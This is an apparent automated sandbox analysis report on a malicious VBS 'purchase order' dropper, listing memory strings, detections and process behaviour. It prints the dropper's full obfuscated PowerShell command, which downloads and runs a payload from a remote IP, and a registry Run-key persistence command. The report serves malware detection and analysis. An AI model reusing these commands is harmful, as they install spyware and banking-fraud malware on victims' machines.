              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
              Source: wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673905797.0000027B9BFC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673905797.0000027B9BFC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
              Source: wscript.exe, 00000000.00000003.1673905797.0000027B9BFC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
              Source: wscript.exe, 00000000.00000003.1672577276.0000027B9DE82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673839123.0000027B9DE82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673064207.0000027B9DE82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682360345.0000027B9DE82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681604047.0000027B9DE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672767605.0000027B9DE38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672767605.0000027B9DE38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
              Source: wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
              Source: wscript.exe, 00000000.00000003.1672717287.0000027B9DE3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
              Source: wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
              Source: wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672337206.0000027B9BFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
              Source: wscript.exe, 00000000.00000003.1672429213.0000027B9DE9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: wscript.exe, 00000000.00000003.1672429213.0000027B9DE9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
              Source: wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
              Source: wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C0361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000007.00000002.2304380055.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
              Source: powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671268631.0000027B9DEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/r0
              Source: wscript.exe, 00000000.00000002.1699489398.0000027B9DEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671268631.0000027B9DEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: wscript.exe, 00000000.00000003.1696810979.0000027B9BF3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BF9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: powershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2344127035.000001E3C16F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673905797.0000027B9BFC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
              Source: wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
              Source: wscript.exe, 00000000.00000003.1673564455.0000027B9BFB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672320958.0000027B9BFB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
              Source: wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
              Source: wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
              Source: wscript.exe, 00000000.00000002.1699198802.0000027B9DE2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
              Source: wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
              Source: wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000002.2953979686.0000000005159000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\lmouitrs.dat, type: DROPPED

              System Summary

              barindex
              Source: amsi32_5552.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6228, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5552, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file: Call Hrer.ShellExecute("P" & Synsmndene & ".e" + "xe", nedrykkedes, "", "", Hypopotassemic)
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2806
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2806
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2806Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2806Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_047F3031 Sleep,NtProtectVirtualMemory,9_2_047F3031
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B98BF521_2_00007FFD9B98BF52
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B98B1A61_2_00007FFD9B98B1A6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0464F2507_2_0464F250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0464FB207_2_0464FB20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0464EF087_2_0464EF08
              Source: PO_La-Tanerie04180240124.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
              Source: amsi32_5552.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5552, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@17/10@4/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Eyelike0.ForJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\akmsnxbfg-E906PA
